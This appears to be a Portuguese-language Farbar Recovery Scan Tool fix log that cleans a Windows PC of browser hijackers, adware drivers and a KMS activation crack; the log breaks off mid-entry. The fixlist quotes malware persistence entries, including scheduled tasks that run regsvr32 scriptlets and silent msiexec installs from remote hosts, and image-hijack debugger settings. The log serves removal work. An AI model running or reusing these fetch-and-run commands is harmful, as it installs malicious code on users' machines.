Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 27-04-2017 Executado por ADEMIR MONTEIRO (28-04-2017 14:15:27) Run:1 Executando a partir de C:\Users\ADEMIR MONTEIRO\Desktop Perfis Carregados: ADEMIR MONTEIRO (Perfis Disponíveis: ADEMIR MONTEIRO) Modo da Inicialização: Normal ============================================== fixlist Conteúdo: ***************** start CloseProcesses: CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001" CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} CHR DefaultSearchKeyword: Default -> ourluckysites Edge HomeButtonPage: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 ShellIconOverlayIdentifiers: [BaiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Nenhum Arquivo HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrição <======= ATENÇÃO HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyByEzzyCyB0A0F0A0Dzy0EyD0FyByD0DtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyCzzyB0EyC0EyE0EtGtB0AtDyBtGyCtAtBtDtGyE0F0C0BtGyBzytAzytCyByE0FzzzztByE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0Ezy0A0A0B0CtBtG0DyC0F0FtGyE0AyDtCtGzzzyyEyDtG0CtB0Bzz0FyC0BtCtC0DtBtB2QtN0A0LzutBtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D865514241%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms} SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_07¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyByEzzyCyB0A0F0A0Dzy0EyD0FyByD0DtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StAyC0C0Czyzy0FzytGyDzztCyEtG0EtByB0FtGyCyDtBtBtG0F0C0FzytA0B0E0F0Dzz0EtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0Ezy0A0A0B0CtBtG0DyC0F0FtGyE0AyDtCtGzzzyyEyDtG0CtB0Bzz0FyC0BtCtC0DtBtB2QtN0A0LzutB%26cr%3D1124482491%26a%3Dwbf_fs_17_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms} SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyByEzzyCyB0A0F0A0Dzy0EyD0FyByD0DtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyCzzyB0EyC0EyE0EtGtB0AtDyBtGyCtAtBtDtGyE0F0C0BtGyBzytAzytCyByE0FzzzztByE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0Ezy0A0A0B0CtBtG0DyC0F0FtGyE0AyDtCtGzzzyyEyDtG0CtB0Bzz0FyC0BtCtC0DtBtB2QtN0A0LzutBtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D865514241%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_07¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyByEzzyCyB0A0F0A0Dzy0EyD0FyByD0DtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StAyC0C0Czyzy0FzytGyDzztCyEtG0EtByB0FtGyCyDtBtBtG0F0C0FzytA0B0E0F0Dzz0EtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0Ezy0A0A0B0CtBtG0DyC0F0FtGyE0AyDtCtGzzzyyEyDtG0CtB0Bzz0FyC0BtCtC0DtBtB2QtN0A0LzutB%26cr%3D1124482491%26a%3Dwbf_fs_17_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyByEzzyCyB0A0F0A0Dzy0EyD0FyByD0DtN0D0Tzu0StCzytBzztN1L2XzutAtFtBzytFtAtFyDzztN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyCzzyB0EyC0EyE0EtGtB0AtDyBtGyCtAtBtDtGyE0F0C0BtGyBzytAzytCyByE0FzzzztByE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0Ezy0A0A0B0CtBtG0DyC0F0FtGyE0AyDtCtGzzzyyEyDtG0CtB0Bzz0FyC0BtCtC0DtBtB2QtN0A0LzutBtN1B2Z1V1T1S1NzutCtByCyBtB%26cr%3D865514241%26a%3Dwbf_fs_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms} SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001&q={searchTerms} SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6F2E5825-C576-4536-A9BE-FF7181495112} URL = SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {BD62CFA9-F375-461C-A90E-AB90B578F202} URL = hxxps://br.search.yahoo.com/search?p={searchTerms}&intl=br&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle Task: {0F373340-7552-468F-805A-12372F3EBBA3} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO Task: {1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} - System32\Tasks\{864BC306-9BC2-4E24-860C-052C2BDED33D} => launchwinapp.exe hxxp://ui.skype.com/ui/0/6.3.73.105.457/pt/go/help.faq.installer?LastError=1603 Task: {1C13CF54-132B-47A3-A9C3-46781DDE17AA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO Task: {1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} - \Microsoft\Windows\Setup\gwx\rundetector -> Nenhum Arquivo <==== ATENÇÃO Task: {2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATENÇÃO Task: {25AF1857-93F1-41E3-95BA-7EE079948513} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll Task: {3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO Task: {4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} - System32\Tasks\R@1n-KMS\Office14ProPlus => wmic Task: {4DCED5E7-C4D2-48E0-9465-4A9A58089B29} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Nenhum Arquivo <==== ATENÇÃO Task: {5280B2E7-F127-40B0-AF3E-0A0674B4F874} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO Task: {77706C8A-94AF-4E57-B8E2-03CF78500731} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Nenhum Arquivo <==== ATENÇÃO Task: {7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO Task: {84A4D586-F069-481B-8AC3-656EF9F0018C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated) Task: {8DC21957-9D43-435F-A928-0AC2F312D7CE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO Task: {A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO Task: {B682F9E1-06F9-433A-803D-072B9B9DB540} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO Task: {C1AC93B9-454A-437E-9027-1A2004FA261D} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Nenhum Arquivo <==== ATENÇÃO Task: {C6392B5A-3A2E-4477-B098-2CA65E62ACE6} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Nenhum Arquivo <==== ATENÇÃO Task: {CC21D6E8-24A8-4ABE-8FEB-697524D453D0} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO Task: {CD7FFAF9-0423-42E9-A52D-5840EDA92753} - \BackgroundContainer Startup Task -> Nenhum Arquivo <==== ATENÇÃO Task: {E0A2BEA2-67D5-468B-87FB-8A28DC93D858} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q Task: {E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO Task: {F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll Task: {F961350E-3BDD-4EB4-9FDA-1DE60446BA52} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO Task: {FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} - \WPD\SqmUpload_S-1-5-21-1492537628-2073842835-3753687853-1001 -> Nenhum Arquivo <==== ATENÇÃO ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001 HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\OSppSvc.exe: [Debugger] KMS-R@1nHook.exe IFEO\SppExtComObj.exe: [Debugger] KMS-R@1nHook.exe IFEO\taskmgr.exe: [Debugger] 2014-07-06 17:59 - 2014-07-06 17:59 - 0003584 _____ () C:\Users\ADEMIR MONTEIRO\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2015-03-22 09:43 - 2015-03-22 09:43 - 0000227 _____ () C:\ProgramData\bc.ini 2016-10-22 12:50 - 2016-10-22 12:50 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2013-11-22 08:40 - 2013-11-22 08:40 - 0170344 _____ (Baidu, Inc.) C:\ProgramData\FileSplitUpLoad.dll 2013-10-08 04:12 - 2013-10-08 04:12 - 0000119 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log 2013-10-08 04:06 - 2013-10-08 04:08 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log 2013-10-08 04:08 - 2013-10-08 04:10 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log 2013-10-08 04:06 - 2013-10-08 04:06 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log 2013-10-08 04:10 - 2013-10-08 04:12 - 0000108 _____ () C:\ProgramData\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}.log 2017-04-17 19:11 - 2017-04-17 19:11 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\Firefox 2017-04-17 19:10 - 2017-04-17 19:10 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Firefox 2017-04-17 19:19 - 2017-04-17 19:19 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-04-17 19:12 - 2017-04-17 19:12 - 00000007 _____ C:\WINDOWS\SysWOW64\D50A.tmp 2017-04-18 11:55 - 2017-04-18 11:55 - 00000000 ____D C:\ProgramData\SUPERAntiSpyware.com 2017-04-18 11:54 - 2017-04-18 11:54 - 29831752 _____ (SUPERAntiSpyware) C:\Users\ADEMIR MONTEIRO\Downloads\SUPERAntiSpyware.exe 2016-12-24 00:29 - 2016-12-24 00:29 - 0767688 _____ () C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\InstallHelper.exe 2017-03-02 10:48 - 2017-03-02 10:48 - 0739904 _____ (Oracle Corporation) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u121-windows-au.exe 2017-04-22 10:10 - 2017-04-22 10:10 - 0739904 _____ (Oracle Corporation) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u131-windows-au.exe 2017-02-18 15:33 - 2017-02-18 15:38 - 44048864 _____ (Skype Technologies S.A.) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\SkypeSetup.exe 2017-04-13 00:35 - 2017-04-13 00:35 - 2085648 _____ (Vitzo Limited ) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\tmp6CD8.tmp.exe 2016-07-10 01:16 - 2016-07-10 01:16 - 00026112 _____ () C:\Windows\KMS-R@1n.exe 2016-07-10 01:16 - 2016-07-10 01:16 - 00005120 _____ () C:\WINDOWS\KMS-R@1nHook.exe 2016-07-10 01:16 - 2016-07-10 01:16 - 00004096 _____ () C:\WINDOWS\KMS-R@1nHook.dll 2017-04-17 19:19 - 2017-04-13 00:08 - 00116400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe 2017-04-2C:\ProgramData\FileSplitUpLoad.dll C:\Users\Todos os Usuários\FileSplitUpLoad.dll 5 09:28 - 2016-05-22 23:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll 2017-04-25 09:28 - 2016-05-22 23:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll 2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\WINDOWS\system32\log 2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech 2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\Program Files (x86)\Elex-tech 2017-04-25 09:28 - 2016-05-22 23:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys 2017-04-25 09:28 - 2016-05-19 03:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== /q HKLM-x32\...\Run: [PSafeTray] => C:\Program Files (x86)\PSafe\PSafeSysTray.exe [3370184 2014-07-11] (PSafe) HKLM-x32\...\Run: [PSafeWDS] => C:\Program Files (x86)\PSafe\PSafeWDS.exe [144584 2014-07-11] (PSafe S.A.) HKLM-x32\...\Run: [BAV mini setup] => "C:\ProgramData\Baidu\Antivirus\UNT233D.exe" /S /NOTRAY partner=RebootRun HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo FirewallRules: [{6B446C8A-9266-46AB-85A6-E92C5974B43E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{262684D5-BC5E-4F5C-8F2E-98E50A972023}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{2F741DD0-F787-409E-A9D6-5CC26B96E1B6}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{63A99386-ABB8-4DE5-B464-8682581FB0CB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116400 2017-04-13] () <==== ATENÇÃO R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda R2 Kitty; C:\Users\ADEMIR MONTEIRO\AppData\Local\Kitty\Kitty.dll [583168 2017-04-25] (kitty) [Arquivo não assinado] <==== ATENÇÃO R2 KMS-R@1n; C:\Windows\KMS-R@1n.exe [26112 2016-07-10] () [Arquivo não assinado] R2 PSafeSVC; C:\Program Files (x86)\PSafe\psafesvc.exe [2605768 2014-07-11] (PSafe S/A) R2 PSafeWD; C:\Program Files (x86)\PSafe\PSafeWD.exe [266952 2014-07-11] (PSafe S.A.) R2 WinSAPSvc; C:\Users\ADEMIR MONTEIRO\AppData\Roaming\WinSAPSvc\WinSAP.dll [508928 2017-04-25] (winsap) [Arquivo não assinado] <==== ATENÇÃO R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATENÇÃO C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe CreateRestorePoint: RemoveProxy: EmptyTemp: Hosts: Reboot: end ***************** Processos fechados com sucesso. Chrome StartupUrls => removido (a) com sucesso. Chrome DefaultSearchURL => removido (a) com sucesso. Chrome DefaultSearchKeyword => removido (a) com sucesso. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage => valor removido (a) com sucesso. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\BaiduAntivirusIconLock => chave removido (a) com sucesso. HKCR\CLSID\{0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => chave não encontrado (a). HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => chave removido (a) com sucesso. HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Erro ao configurar valor. HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Erro ao configurar valor. HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Erro ao configurar valor. HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Erro ao configurar valor. HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Erro ao configurar valor. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Erro ao configurar valor. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Erro ao configurar valor. HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave não encontrado (a). HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave não encontrado (a). HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Erro ao configurar valor. HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida HKCR\Wow6432Node\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave não encontrado (a). HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet 